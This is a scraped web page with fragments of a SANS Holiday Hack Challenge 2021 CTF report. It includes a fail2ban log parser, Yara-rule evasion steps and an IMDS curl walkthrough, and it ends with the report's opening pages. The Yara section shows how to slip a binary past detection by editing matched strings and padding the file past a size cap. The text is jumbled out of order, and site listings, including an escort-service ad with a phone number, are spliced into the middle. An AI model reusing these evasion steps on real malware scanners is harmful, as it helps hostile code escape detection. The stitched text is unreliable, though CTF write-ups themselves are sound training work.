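    return [f"{start + i * step:%Y-%m-%d %H:%M:%S} " + template.format(ip=ip)
            for i in range(count)]

T0 = datetime(2021, 12, 24, 13, 0, 0)
SAMPLE_LOG = sorted(  # constructed; the two banned IPs come from the report's output
    _series("144.115.185.234", T0, 10, timedelta(minutes=3),
            "Failed login from {ip} for alpha")
    + _series("222.132.239.194", T0, 11, timedelta(minutes=5),
              "{ip} sent a malformed request")
    + _series("203.0.113.7", T0, 12, timedelta(minutes=25),      # never 10 within an hour
              "Invalid heartbeat 'bravo' from {ip}")
    + _series("10.20.30.40", T0, 4, timedelta(minutes=1),        # too few failures
              "Login from {ip} rejected due to unknown user name")
    + [f"{T0:%Y-%m-%d %H:%M:%S} Valid heartbeat 'charlie' from 10.20.30.41",
       f"{T0:%Y-%m-%d %H:%M:%S} Login from 10.20.30.42 for delta success"]
)

if __name__ == "__main__":
    for ip in naughty_ips(SAMPLE_LOG):
        print(f"{ip} has been added to the naughty list!")
```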
Now we can restart fail2ban and it will automatically detect all the bad hosts and block them.
Upon completing this challenge, we can talk with Eve Snowshoes to get hints for Objective 8 – Kerberoasting on an
Open Fire. We also receive the HoHo … No achievement.
3.7 Yara Analysis
This terminal challenge requires you to modify an executable so that it runs without being caught by Yara rules.
No hints were given for this challenge besides those in the dialog with Fitzy Shortstack. Solving this challenge
earns you hints for the Splunk objective from Fitzy. Upon executing the program the first time, we find the following:
Examining Yara rule 135, we find it contains the following.
root@fe3682bbf503:~/etc/fail2ban/jail.d# service fail2ban restart
* Restarting Authentication failure monitor fail2ban
Log file refreshed! It may take fail2ban a few moments to re-process
144.115.185.234 has been added to the naughty list!
222.132.239.194 has been added to the naughty list!
...
***********************************************************************
* You stopped the attacking systems! You saved our systems!
*
* Thank you for all of your help. You are a talented defender!
**********************************************************************
HELP!!!
This critical application is supposed to tell us the sweetness levels of our candy
manufacturing output (among other important things), but I can't get it to run.
It keeps saying something something yara. Can you take a look and see if you
can help get this application to bypass Sparkle Redberry's Yara scanner?
If we can identify the rule that is triggering, we might be able change the program
to bypass the scanner.
We have some tools on the system that might help us get this application going:
vim, emacs, nano, yara, and xxd
The children will be very disappointed if their candy won't even cause a single cavity.
snowball2@5a4e406f3ee8:~$ ls
the_critical_elf_app yara_rules
snowball2@5a4e406f3ee8:~$ ./the_critical_elf_app
yara_rule_135 ./the_critical_elf_app
[santa_jail]
enabled = true
logpath = /var/log/hohono.log
findtime = 1h
maxretry = 10
bantime = 1h
filter = santa
action = santa
We can use vim with xxd to edit the file and modify the string candycane so that the executable bypasses rule 135.
After making this change and rerunning the application we get the following result:
Examining rule 1056 we find:
This rule looks for two specific hex strings, and both must match for the rule to fire.
Let’s edit our file again in vim with xxd. The first string looks like a reference to a Linux library, so it
probably can’t be changed.
The next hex string looks like a candidate:
We can change the first 21 to 23 to turn !! into #!, and that should get us past rule 1056. Sure enough, upon
execution we find the following:
Now we need to bypass rule 1732. Let’s look at the rule:
rule yara_rule_135 {
    meta:
        description = "binaries - file Sugar_in_the_machinery"
        author = "Sparkle Redberry"
        reference = "North Pole Malware Research Lab"
        date = "1955-04-21"
        hash = "19ecaadb2159b566c39c999b0f860b4d8fc2824eb648e275f57a6dbceaf9b488"
    strings:
        $s = "candycane"
    condition:
        $s
}
00002000: 0100 0200 0000 0000 6361 6e64 7963 616d ........candycam
00002010: 6500 6e61 7567 6874 7920 7374 7269 6e67 e.naughty string
snowball2@5a4e406f3ee8:~$ ./the_critical_elf_app
yara_rule_1056 ./the_critical_elf_app
rule yara_rule_1056 {
    meta:
        description = "binaries - file frosty.exe"
        author = "Sparkle Redberry"
        reference = "North Pole Malware Research Lab"
        date = "1955-04-21"
        hash = "b9b95f671e3d54318b3fd4db1ba3b813325fcef462070da163193d7acb5fcd03"
    strings:
        $s1 = {6c 6962 632e 736f 2e36}
        $hs2 = {726f 6772 616d 2121}
    condition:
        all of them
}
00000450: 0000 0000 0000 0000 006c 6962 632e 736f .........libc.so
00000460: 2e36 005f 5f63 7861 5f66 696e 616c 697a .6.__cxa_finaliz
00002050: 6973 2070 726f 6772 616d 2121 0000 0000 is program!!....
00002060: 486f 6c69 6461 7948 6163 6b43 6861 6c6c HolidayHackChall
snowball2@5a4e406f3ee8:~$ ./the_critical_elf_app
yara_rule_1732 ./the_critical_elf_app
There are 20 strings listed in this rule, most of them critical to the function of the program, so they cannot be
changed. At least 10 of the strings have to match for this rule to fire, but the file size must also be under 50KB. Let’s
see if we can inflate the file past 50KB and get it to run.
Now we can run the app and bypass the final Yara rule. We are awarded the Yara Analysis achievement.
3.8 IMDS Exploration
The IMDS Exploration terminal is in Jack Frost’s bathroom, and solving it is required to get hints for
Objective 10 from Noxious O Dior. This terminal is a walkthrough and requires you to complete all of its
steps, so no hints for the terminal are given. The steps to solve this challenge are listed below.
🎄🎄🎄 Prof. Petabyte here. In this lesson you'll continue to build your cloud asset skills,
🎄🎄🎄 interacting with the Instance Metadata Service (IMDS) using curl.
🎄🎄🎄
🎄🎄🎄 If you get stuck, run 'hint' for assitance.
🎄🎄🎄
Are you ready to begin? [Y]es: Y
The Instance Metadata Service (IMDS) is a virtual server for cloud assets at the IP address
169.254.169.254. Send a couple ping packets to the server.
elfu@ef2c3d6109b8:~$ ping 169.254.169.254 -c 2
PING 169.254.169.254 (169.254.169.254) 56(84) bytes of data.
64 bytes from 169.254.169.254: icmp_seq=1 ttl=64 time=0.017 ms
64 bytes from 169.254.169.254: icmp_seq=2 ttl=64 time=0.037 ms
--- 169.254.169.254 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1010ms
rtt min/avg/max/mdev = 0.017/0.027/0.037/0.010 ms
IMDS provides information about currently running virtual machine instances. You can use it
to manage and configure cloud nodes. IMDS is used by all major cloud providers.
Run 'next' to continue.
elfu@ef2c3d6109b8:~$ next
Developers can automate actions using IMDS. We'll interact with the server using the cURL
tool. Run 'curl http://169.254.169.254' to access IMDS data.
elfu@ef2c3d6109b8:~$ curl http://169.254.169.254
latest
rule yara_rule_1732 {
    meta:
        description = "binaries - alwayz_winter.exe"
        author = "Santa"
        reference = "North Pole Malware Research Lab"
        date = "1955-04-22"
        hash = "c1e31a539898aab18f483d9e7b3c698ea45799e78bddc919a7dbebb1b40193a8"
    strings:
        $s1 = "This is critical for the execution of this program!!" fullword ascii
        ...
        $s20 = "__libc_csu_init" fullword ascii
    condition:
        uint32(1) == 0x02464c45 and filesize < 50KB and
        10 of them
}
head -c 52224 /dev/random >> ./the_critical_elf_app
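Why the size trick works, as an added Python example that is not the challenge’s code: the condition of rule 1732 is modelled by hand (yara itself is not used) against a constructed ELF-like blob, showing that the uint32(1) check reads the bytes "ELF" plus the 64-bit class byte, that appended padding flips only the filesize clause, and that the same rule without the size cap keeps matching. Only $s1 and $s20 are quoted in the report, so the other 18 strings are constructed stand-ins.

```python
import struct

# Added example, not the challenge's files: a plain-Python model of the condition
# in yara_rule_1732. Only $s1 and $s20 are quoted in the report; the remaining
# strings are constructed stand-ins.
RULE_STRINGS = [b"This is critical for the execution of this program!!",
                b"__libc_csu_init"] + [f"constructed_string_{i:02d}".encode() for i in range(2, 20)]

def is_elf64(data):
    """uint32(1) == 0x02464c45: the little-endian bytes 45 4c 46 02 at offset 1,
    i.e. 'ELF' immediately followed by the 64-bit class byte of e_ident."""
    return len(data) >= 5 and struct.unpack_from("<I", data, 1)[0] == 0x02464C45

def count_strings(data, strings=RULE_STRINGS):
    """How many of the rule's strings occur in the file (the '10 of them' count)."""
    return sum(1 for s in strings if s in data)

def rule_1732(data):
    """The rule as written: ELF64 magic and filesize < 50KB and 10 of them."""
    return is_elf64(data) and len(data) < 50 * 1024 and count_strings(data) >= 10

def rule_1732_hardened(data):
    """Same detection without the size cap, which appended junk cannot defeat."""
    return is_elf64(data) and count_strings(data) >= 10

def fake_elf():
    """Constructed 'binary': a 16-byte ELF64 e_ident followed by all 20 strings."""
    return (b"\x7fELF\x02\x01\x01" + b"\x00" * 9
            + b"\x00".join(RULE_STRINGS) + b"\x00" * 4096)

def pad(data, extra=52224):
    """The report's bypass (head -c 52224 /dev/random >> file), with zero bytes
    instead of random ones; only the length matters to the rule."""
    return data + b"\x00" * extra

if __name__ == "__main__":
    original, padded = fake_elf(), pad(fake_elf())
    print("rule 1732 on original:", rule_1732(original))
    print("rule 1732 after padding:", rule_1732(padded))
    print("hardened rule after padding:", rule_1732_hardened(padded))
```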
Different providers will have different formats for IMDS data. We're using an AWS-compatible
IMDS server that returns 'latest' as the default response. Access the 'latest' endpoint.
Run 'curl http://169.254.169.254/latest'
elfu@ef2c3d6109b8:~$ curl http://169.254.169.254/latest
dynamic
meta-data
IMDS returns two new endpoints: dynamic and meta-data. Let's start with the dynamic
endpoint, which provides information about the instance itself. Repeat the request
to access the dynamic endpoint: 'curl http://169.254.169.254/latest/dynamic'.
elfu@ef2c3d6109b8:~$ curl http://169.254.169.254/latest/dynamic
fws/instance-monitoring
instance-identity/document
instance-identity/pkcs7
instance-identity/signature
Much of the data retrieved from IMDS will be returned in JavaScript Object Notation (JSON)
format. Piping the output to 'jq' will make the content easier to read.
Re-run the previous command, sending the output to JQ: 'curl
http://169.254.169.254/latest/dynamic/instance-identity/document | jq'
elfu@ef2c3d6109b8:~$ curl http://169.254.169.254/latest/dynamic/instance-identity/document | jq
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 451 100 451 0 0 440k 0 --:--:-- --:--:-- --:--:-- 440k
{
"accountId": "PCRVQVHN4S0L4V2TE",
"imageId": "ami-0b69ea66ff7391e80",
"availabilityZone": "np-north-1f",
"ramdiskId": null,
"kernelId": null,
"devpayProductCodes": null,
"marketplaceProductCodes": null,
"version": "2017-09-30",
"privateIp": "10.0.7.10",
"billingProducts": null,
"instanceId": "i-1234567890abcdef0",
"pendingTime": "2021-12-01T07:02:24Z",
"architecture": "x86_64",
"instanceType": "m4.xlarge",
"region": "np-north-1"
}
The instance identity document can be used by developers to understand the instance details.
Repeat the request, this time requesting the instance-identity/document resource:
'curl http://169.254.169.254/latest/dynamic/instance-identity/document'.
elfu@ef2c3d6109b8:~$ curl http://169.254.169.254/latest/dynamic/instance-identity/document
{
"accountId": "PCRVQVHN4S0L4V2TE",
"imageId": "ami-0b69ea66ff7391e80",
"availabilityZone": "np-north-1f",
"ramdiskId": null,
"kernelId": null,
"devpayProductCodes": null,
"marketplaceProductCodes": null,
"version": "2017-09-30",
"privateIp": "10.0.7.10",
"billingProducts": null,
"instanceId": "i-1234567890abcdef0",
"pendingTime": "2021-12-01T07:02:24Z",
"architecture": "x86_64",
"instanceType": "m4.xlarge",
"region": "np-north-1"
} elfu@ef2c3d6109b8:~$
Mastercam x6-mill-level-1-tutorial-1Manuel Alejandro
 
Hide Assignment InformationTurnitin®This assignment will be subm.docx
Hide Assignment InformationTurnitin®This assignment will be subm.docxHide Assignment InformationTurnitin®This assignment will be subm.docx
Hide Assignment InformationTurnitin®This assignment will be subm.docxsimonithomas47935
 

Similaire à 2021 SANS Holiday Hack Report (20)

CSS CORE 1 - INSTALL & CONFIGURE COMPUTER SYSTEMS AND NETWORKS
CSS CORE 1 - INSTALL & CONFIGURE COMPUTER SYSTEMS AND NETWORKSCSS CORE 1 - INSTALL & CONFIGURE COMPUTER SYSTEMS AND NETWORKS
CSS CORE 1 - INSTALL & CONFIGURE COMPUTER SYSTEMS AND NETWORKS
 
3 - Thermometer.pptx thermometer thermometer thermometer
3 - Thermometer.pptx thermometer thermometer thermometer3 - Thermometer.pptx thermometer thermometer thermometer
3 - Thermometer.pptx thermometer thermometer thermometer
 
IEEE College of Technology MAES SE 2020 - Coding Fun
IEEE College of Technology MAES SE 2020 - Coding FunIEEE College of Technology MAES SE 2020 - Coding Fun
IEEE College of Technology MAES SE 2020 - Coding Fun
 
Contact management system
Contact management systemContact management system
Contact management system
 
Chapter 2(1)
Chapter 2(1)Chapter 2(1)
Chapter 2(1)
 
SessionNine_HowandWheretoGetHelp
SessionNine_HowandWheretoGetHelpSessionNine_HowandWheretoGetHelp
SessionNine_HowandWheretoGetHelp
 
User rpl tut
User rpl tutUser rpl tut
User rpl tut
 
Week1 programming challenges
Week1 programming challengesWeek1 programming challenges
Week1 programming challenges
 
Using Show Commands to Investigate Network Status Lab Grading Ru.docx
Using Show Commands to Investigate Network Status Lab Grading Ru.docxUsing Show Commands to Investigate Network Status Lab Grading Ru.docx
Using Show Commands to Investigate Network Status Lab Grading Ru.docx
 
Microbit madness lesson 2
Microbit madness lesson 2Microbit madness lesson 2
Microbit madness lesson 2
 
The only thing that matters
The only thing that mattersThe only thing that matters
The only thing that matters
 
Document Analysis with Deep Learning
Document Analysis with Deep LearningDocument Analysis with Deep Learning
Document Analysis with Deep Learning
 
report
reportreport
report
 
Lab 1 reference manual
Lab 1 reference manualLab 1 reference manual
Lab 1 reference manual
 
Mastercam x6-mill-level-1-tutorial-1
Mastercam x6-mill-level-1-tutorial-1Mastercam x6-mill-level-1-tutorial-1
Mastercam x6-mill-level-1-tutorial-1
 
Mastercam x6-mill-level-1-tutorial-1
Mastercam x6-mill-level-1-tutorial-1Mastercam x6-mill-level-1-tutorial-1
Mastercam x6-mill-level-1-tutorial-1
 
K to 12 computer hardware servicing
K to 12 computer hardware servicingK to 12 computer hardware servicing
K to 12 computer hardware servicing
 
Face Detection And Tracking
Face Detection And TrackingFace Detection And Tracking
Face Detection And Tracking
 
K to 12 pc hardware servicing learning module
K to 12 pc hardware servicing learning moduleK to 12 pc hardware servicing learning module
K to 12 pc hardware servicing learning module
 
Hide Assignment InformationTurnitin®This assignment will be subm.docx
Hide Assignment InformationTurnitin®This assignment will be subm.docxHide Assignment InformationTurnitin®This assignment will be subm.docx
Hide Assignment InformationTurnitin®This assignment will be subm.docx
 

Dernier

Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Neo4j
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 

Dernier (20)

Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 

2021 SANS Holiday Hack Report

  • 1. Objective and Terminal Assessment Report Author: Steven Maestas Tuesday, December 21st , 2021
  • 2. SANS HHC: Challenge and Terminal Assessment Report Table of Contents 1 Summary.............................................................................................................................................................3 1.1 Executive Summary.....................................................................................................................................3 1.2 Assessment Summary..................................................................................................................................3 2 Objectives............................................................................................................................................................3 2.1 Objective 1 – Kringlecon Orientation..........................................................................................................3 2.2 Objective 2 – Where in the World is Caramel Santaigo?.............................................................................4 2.3 Objective 3 – Thaw Frost Tower’s Entrance................................................................................................7 2.4 Objective 4 – Slot Machine Investigation....................................................................................................9 2.5 Objective 5 – Strange USB Device............................................................................................................10 2.6 Objective 6 - Shellcode Primer..................................................................................................................11 2.7 Objective 7 – Printer Exploitation.............................................................................................................16 2.8 Objective 8 – Kerberoasting on an Open Fire............................................................................................18 2.9 Objective 9 – 
Splunk!................................................................................................................................24 2.10 Objective 10 – Now Hiring!....................................................................................................................26 2.11 Objective 11 – Customer Complaint Analysis..........................................................................................27 2.12 Objective 12 – Frost Tower Website Checkup.........................................................................................28 2.13 Objective 13 – FPGA Programming........................................................................................................30 2.14 End Game................................................................................................................................................31 3 Terminals...........................................................................................................................................................32 3.1 Exif Metadata............................................................................................................................................32 3.2 Grepping for Gold.....................................................................................................................................32 3.3 Logic Munchers.........................................................................................................................................33 3.4 IPv6 Sandbox.............................................................................................................................................34 3.5 Holiday Hero.............................................................................................................................................35 3.6 HoHo...No.................................................................................................................................................36 3.7 
Yara Analysis.............................................................................................................................................38 3.8 IMDS Exploration.....................................................................................................................................40 3.9 Strace Ltrace Retrace.................................................................................................................................43 3.10 Elf Code Python.......................................................................................................................................44 3.11 Frost-o-Vator............................................................................................................................................49 4 Appendix A........................................................................................................................................................49 4.1 Bonus! Blue Log4Jack...............................................................................................................................49 4.2 Bonus! Red Log4Jack................................................................................................................................50
  • 3. SANS HHC: Challenge and Terminal Assessment Report 1 Summary 1.1 Executive Summary The SANS Holiday Hack Challenge (HHC) is an annual, virtual security conference (Kringlecon) and CTF developed by SANS, sponsored by Google and Splunk and made available for free to anyone who has a web browser, Internet connection, and wants to participate. This year’s HHC became available starting on December 9th 2020. In addition to offering this conference and CTF free of charge, SANS also allows participants to write a report on the challenges (objectives and terminals) and submit that report for a chance to win a variety of prizes. This report has been published as an entrant into that competition. The documentation contained herein relate directly to the solutions to each challenge hosted and solved in the SANS 2021 HHC. 1.2 Assessment Summary Documentation below relates directly to each challenge offered in the SANS 2021 HHC. The technical challenges are split between objectives, which are the main challenges necessary to complete the CTF and the accompanying narrative, and terminals, smaller challenges which are often meant to develop an initial skill set for the objectives or allow the participant to earn hints which allow them to better understand the problems to be solved in the main objectives. This year’s HHC consists of 13 objectives and 14 terminal challenges, adding up to a total of 27 individual technical problems to be solved. This reports details the solution to every objective and terminal challenge. The documentation below will show how each objective or terminal challenge was solved. 2 Objectives 2.1 Objective 1 – Kringlecon Orientation Upon registering or logging in with an account registered in previous HHCs, the user is transported into a virtual world. In this case you begin with an onscreen avatar that you can move with the keyboard arrow keys or mouse. You can interact with other NPCs in the game. 
Your avatar also has a badge in the center of the sprite which gives information such as the currently unlocked narrative, list of objectives, hints, items, achievement, etc. Upon exploring this badge after talking with the first NPC we encounter, we find our first objective. This years Kringlecon includes an orientation challenge that walks you through user interface. No hints are given for this objective The following steps are required to complete this initial objective: • 1a – Talk to Jingle Ringford • 1b – Get your badge • 1c – Get the wifi adapter • 1d – Use the terminal Objectives 1a and 1b will be completed as you talk to Jingle Ringford and he explains the Kringlecon and the functionality of the badge. As you continue to click on Jingle a image of a wifi adapter will appear and you will have to pick it up to complete Objective 1c.
  • 4. SANS HHC: Challenge and Terminal Assessment Report After clicking the wifi adapter, you will move over and pick it up and Objective 1c will be marked as complete. Jingle will also prompt you to talk to him again. When you click on him, a terminal will appear. Click on the terminal and type answer in the top window of the terminal. Terminal challenges can be solved by automatically completing the terminal challenge and having the code automatically register your completion or by typing the correct keyword or phrase into the input window, as seen here. Upon completing this terminal the gate to the rest of the CTF/Kringlecon will automatically open. In addition to showing the objective as solved in the badge, we are also awarded our first two achievements, Kringlecon Tutorial and Open the Gate. 2.2 Objective 2 – Where in the World is Caramel Santaigo? The second objective is an OSINT challenge, where you must use bits of information provided to find out the final destination of a random elf and who that elf is based on their personal characteristics and a builtin search engine that allows you filter a list of elves based on the characteristics you learn. You can also gain additional hints by speaking with Piney Sappington in the courtyard. Hints are given after you solve the Exif Metadata terminal located right beside Piney Sappington. All hints are listed below: Enter the answer here > answer Welcome to the first terminal challenge! This one is intentionally simple. All we need you to do is: Click in the upper pane of this terminal Type answer and press enter elf@d242a1e59d58:~$
  • 5. SANS HHC: Challenge and Terminal Assessment Report • Coordinate Systems – Don’t forget coordinate systems other than lat/long like MGRS and what3words. • Flask Cookies – While Flask cookies can’t generally be forged without the secret, they can often be decoded and read. • OSINT – Clay Moody is giving a talk about OSINT techniques right now! Clicking on the terminal starts the OSINT challenge and presents us with the following instructions. As this investigation will be random and there is potentially a lot of information to process, clue, tool used to investigate, and resulting evidence will be provided in the order it is given for each location in order. Start: Santa’s Castle Investigate1: I’ve heard that when British children put letters to Father Christmas in the fireplace, they magically end up there! Tool: Google Evidence: https://santaclausvillage.info/santa-claus/santa-claus-main-post-office/ - -Santa's Office is in Rovaniemi, Finland, according to a Google search. Investigate2: They just contacted us from an address in the 80.95.128.0/20 range. Tool: Maxmind GeoIP Database Evidence: IP addresses in the 80.95.128.0/20 range are located in Finland according to MaxMind’s GeoIP database. Investigate3: They were dressed for -5.0 C and light snow conditions. The elf mentioned something about Stack Overflow and Golang. Interlink: Language Spoken: GoLang Results: No results based on single attribute Location 1 – Rovaniemi, Finland. Investigate1: They said they wanted to visit Christmas markets – like Christkindlmarkt and Spittelberg, enjoy fried sausages and goulash soup, and drink hot Christmas punch. Tool: Google Evidence: A search for Christkindlmarkt and Spittelberg brings up results for markets held in Vienna, Austria. https://www.visitingvienna.com/sights/christmasmarkets/spittelberg/ Investigate 2: They just contacted us from an address in the the 137.208.0.0/16 range. 
Tool: Maxmind GeoIP Database Evidence: IP addresses in the 137.208.0.0/16 range are located in Vienna, Austria according to MaxMind’s GeoIP database. Welcome! In this game you will analyze clues and track an elf around the world. Put clues about your elf in your InterRick portal. Depart by sleigh once you’ve figured out your next stop. Be sure to get there by Sunday, gumshoe. Good luck! Start Game!
  • 6. SANS HHC: Challenge and Terminal Assessment Report Investigate 3: They were dressed for 2.0 C and fog conditions. The elf got really heated about using spaces for indents. Tool: Interlink: Language Spoken: GoLang, Preferred indents: Spaces Results: Jingle Ringford, Noel Boetie Location 2 – Vienna, Austria Investigate1: I’m not sure what a hogmanay is, but that elf wants to experience one just after Christmas. Tool: Google Evidence: https://www.bbc.co.uk/newsround/38477036. Hogmanay is the Scottish name for New Year celebrations. Investigate2: They sent me this blurry selfie of themselves or someone they met: Tool: Jimpl.com Evidence: 142 m Above Sea Level, Lat: 55 deg 46’ 54.85” N Long: 3 deg 11’ 59.71” E somewhere on the North Sea between Denmark and England/United Kingdom and on the same latitude as Edinburgh, Scotland. Investigate 3: They were dressed for 10.0C and clear conditions. They kept checking their Discord app. Tool: Interlink: Language Spoken: GoLang, Preferred indents: Spaces, Preferred social medium: Discord Results: Noel Boetie Location 3 – Edinburgh, Scotland. Investigate 1: You just missed the elf! Investigate 2: You’ve caught up to the elf in time! Do you know who you’ve caught? Elf: Noel Boetie
